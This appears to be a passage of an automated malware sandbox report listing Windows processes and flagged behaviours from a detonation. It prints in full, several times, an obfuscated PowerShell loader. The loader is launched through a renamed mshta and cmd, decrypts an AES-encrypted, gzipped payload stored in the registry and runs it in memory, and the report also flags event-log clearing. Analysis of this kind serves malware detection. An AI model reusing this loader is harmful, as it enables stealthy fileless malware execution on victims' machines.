pid Process 3372 Explorer.EXE 3936 RuntimeBroker.exe 3324 RuntimeBroker.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2596 wrote to memory of 4692 2596 msedge.exe 84 PID 2596 wrote to memory of 4692 2596 msedge.exe 84 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 4388 2596 msedge.exe 85 PID 2596 wrote to memory of 224 2596 msedge.exe 86 PID 2596 wrote to memory of 224 2596 msedge.exe 86 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 PID 2596 wrote to memory of 4960 2596 msedge.exe 87 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:316
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:956
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:392
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:900
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1104 -
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2804
-
-
C:\Windows\$sxr-mshta.exeC:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-NjlmzKYslurHzAOReMmu4312:DjJrktJf=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:3472 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /c %$sxr-NjlmzKYslurHzAOReMmu4312:DjJrktJf=%3⤵
- Executes dropped EXE
PID:5796 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:5768
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function qMtRC($gWzGN){ $GdrFH=[System.Security.Cryptography.Aes]::Create(); $GdrFH.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GdrFH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GdrFH.Key=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('ebO+Aryuk6gf0BxazN+wB5J+avy0lg7JHhkLWe8y2yI='); $GdrFH.IV=[System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))('xVLhhOD/brto5F3wxDlgbg=='); $hORPG=$GdrFH.('@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@'.Replace('@', ''))(); $Vjthl=$hORPG.('@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@'.Replace('@', ''))($gWzGN, 0, $gWzGN.Length); $hORPG.Dispose(); $GdrFH.Dispose(); $Vjthl;}function OZFAi($gWzGN){ $FFyoT=New-Object System.IO.MemoryStream(,$gWzGN); $mVCUn=New-Object System.IO.MemoryStream; Invoke-Expression '$RAoQb @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$FFyoT,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $RAoQb.CopyTo($mVCUn); $RAoQb.Dispose(); $FFyoT.Dispose(); $mVCUn.Dispose(); $mVCUn.ToArray();}function sohYQ($gWzGN){ $Vjthl = [System.Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($gWzGN); $Vjthl = qMtRC($Vjthl); $Vjthl = [System.Text.Encoding]::('@U@T@F@8@'.Replace('@', '')).('@G@e@t@S@t@r@i@n@g@'.Replace('@', ''))($Vjthl); return $Vjthl;}function execute_function($gWzGN,$ZjYBc){ $oHnMF = @( '$TTMkY = [System.@R@e@f@l@e@c@t@i@o@[email protected]]::Load([byte[]]$gWzGN);'.Replace('@', ''), '$HKdVE = $TTMkY.EntryPoint;', '$HKdVE.Invoke($null, $ZjYBc);' ); foreach ($LLPuJ in $oHnMF) { Invoke-Expression $LLPuJ };}$eozqm = sohYQ('ZW7xhgvLHXMUe5bc4eXVuA==');$Mfplr = sohYQ('PC/5zwoH62em+JweMmmnRF6FFlFwMgxIEjUMY2OAf+E=');$CovkQ = sohYQ('61e5zkqK6YHhnF314dvBlQ==');$pgsFe = sohYQ('VzpK5zKQOkmaog2Fh3I7Hw==');if (@(get-process -ea silentlycontinue $pgsFe).count -gt 1) {exit};$svygs = [Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($eozqm).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($Mfplr);$CCXtH=OZFAi (qMtRC ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($svygs)));execute_function $CCXtH (,[string[]] ($CovkQ)); "4⤵PID:456
-
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass4⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5872 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /C echo [System.Diagnostics.Process]::GetProcessById(5872).WaitForExit();[System.Threading.Thread]::Sleep(5000); function qMtRC($gWzGN){ $GdrFH=[System.Security.Cryptography.Aes]::Create(); $GdrFH.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GdrFH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GdrFH.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('ebO+Aryuk6gf0BxazN+wB5J+avy0lg7JHhkLWe8y2yI='); $GdrFH.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('xVLhhOD/brto5F3wxDlgbg=='); $hORPG=$GdrFH.("@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@".Replace("@", ""))(); $Vjthl=$hORPG.("@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@".Replace("@", ""))($gWzGN, 0, $gWzGN.Length); $hORPG.Dispose(); $GdrFH.Dispose(); $Vjthl;}function OZFAi($gWzGN){ $FFyoT=New-Object System.IO.MemoryStream(,$gWzGN); $mVCUn=New-Object System.IO.MemoryStream; Invoke-Expression '$RAoQb @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$FFyoT,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $RAoQb.CopyTo($mVCUn); $RAoQb.Dispose(); $FFyoT.Dispose(); $mVCUn.Dispose(); $mVCUn.ToArray();}function sohYQ($gWzGN){ $Vjthl = [System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($gWzGN); $Vjthl = qMtRC($Vjthl); $Vjthl = [System.Text.Encoding]::("@U@T@F@8@".Replace("@", "")).("@G@e@t@S@t@r@i@n@g@".Replace("@", ""))($Vjthl); return $Vjthl;}function execute_function($gWzGN,$ZjYBc){ $oHnMF = @( '$TTMkY = [System.@R@e@f@l@e@c@t@i@o@[email protected]]::Load([byte[]]$gWzGN);'.Replace("@", ""), '$HKdVE = $TTMkY.EntryPoint;', '$HKdVE.Invoke($null, $ZjYBc);' ); foreach ($LLPuJ in $oHnMF) { Invoke-Expression $LLPuJ };}$eozqm = sohYQ('ZW7xhgvLHXMUe5bc4eXVuA==');$Mfplr = sohYQ('PC/5zwoH62em+JweMmmnRF6FFlFwMgxIEjUMY2OAf+E=');$CovkQ = sohYQ('61e5zkqK6YHhnF314dvBlQ==');$pgsFe = sohYQ('VzpK5zKQOkmaog2Fh3I7Hw==');if (@(get-process -ea silentlycontinue $pgsFe).count -gt 1) {exit};$svygs = [Microsoft.Win32.Registry]::("@L@o@c@a@l@M@a@c@h@i@n@e@".Replace("@", "")).("@O@p@e@n@S@u@b@k@e@y@".Replace("@", ""))($eozqm).("@G@e@t@V@a@l@u@e@".Replace("@", ""))($Mfplr);$CCXtH=OZFAi (qMtRC ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($svygs)));execute_function $CCXtH (,[string[]] ($CovkQ)); | C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass > nul5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
PID:5772 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo [System.Diagnostics.Process]::GetProcessById(5872).WaitForExit();[System.Threading.Thread]::Sleep(5000); function qMtRC($gWzGN){ $GdrFH=[System.Security.Cryptography.Aes]::Create(); $GdrFH.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GdrFH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GdrFH.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('ebO+Aryuk6gf0BxazN+wB5J+avy0lg7JHhkLWe8y2yI='); $GdrFH.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('xVLhhOD/brto5F3wxDlgbg=='); $hORPG=$GdrFH.("@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@".Replace("@", ""))(); $Vjthl=$hORPG.("@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@".Replace("@", ""))($gWzGN, 0, $gWzGN.Length); $hORPG.Dispose(); $GdrFH.Dispose(); $Vjthl;}function OZFAi($gWzGN){ $FFyoT=New-Object System.IO.MemoryStream(,$gWzGN); $mVCUn=New-Object System.IO.MemoryStream; Invoke-Expression '$RAoQb @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$FFyoT,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $RAoQb.CopyTo($mVCUn); $RAoQb.Dispose(); $FFyoT.Dispose(); $mVCUn.Dispose(); $mVCUn.ToArray();}function sohYQ($gWzGN){ $Vjthl = [System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($gWzGN); $Vjthl = qMtRC($Vjthl); $Vjthl = [System.Text.Encoding]::("@U@T@F@8@".Replace("@", "")).("@G@e@t@S@t@r@i@n@g@".Replace("@", ""))($Vjthl); return $Vjthl;}function execute_function($gWzGN,$ZjYBc){ $oHnMF = @( '$TTMkY = [System.@R@e@f@l@e@c@t@i@o@[email protected]]::Load([byte[]]$gWzGN);'.Replace("@", ""), '$HKdVE = $TTMkY.EntryPoint;', '$HKdVE.Invoke($null, $ZjYBc);' ); foreach ($LLPuJ in $oHnMF) { Invoke-Expression $LLPuJ };}$eozqm = sohYQ('ZW7xhgvLHXMUe5bc4eXVuA==');$Mfplr = sohYQ('PC/5zwoH62em+JweMmmnRF6FFlFwMgxIEjUMY2OAf+E=');$CovkQ = sohYQ('61e5zkqK6YHhnF314dvBlQ==');$pgsFe = sohYQ('VzpK5zKQOkmaog2Fh3I7Hw==');if (@(get-process -ea silentlycontinue $pgsFe).count -gt 1) {exit};$svygs = [Microsoft.Win32.Registry]::("@L@o@c@a@l@M@a@c@h@i@n@e@".Replace("@", "")).("@O@p@e@n@S@u@b@k@e@y@".Replace("@", ""))($eozqm).("@G@e@t@V@a@l@u@e@".Replace("@", ""))($Mfplr);$CCXtH=OZFAi (qMtRC ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($svygs)));execute_function $CCXtH (,[string[]] ($CovkQ)); "6⤵PID:3612
-
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass6⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5764
-
-
-
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1120
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1132
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1424
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2604
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1580
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1592
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1816
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:1968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1980
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2132
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2264
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2328
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2784
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2812
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2824
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2856
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2868
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2792
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3372 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/topics/tiktok-bot-views2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8ef2a46f8,0x7ff8ef2a4708,0x7ff8ef2a47183⤵PID:4692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:23⤵PID:4388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2596 /prefetch:83⤵PID:4960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:13⤵PID:5048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:13⤵PID:3652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:83⤵PID:2844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5524 /prefetch:83⤵PID:4592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:13⤵PID:2272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5576 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:4320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:13⤵PID:2432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:13⤵PID:3920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:13⤵PID:4356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:13⤵PID:428
-
-
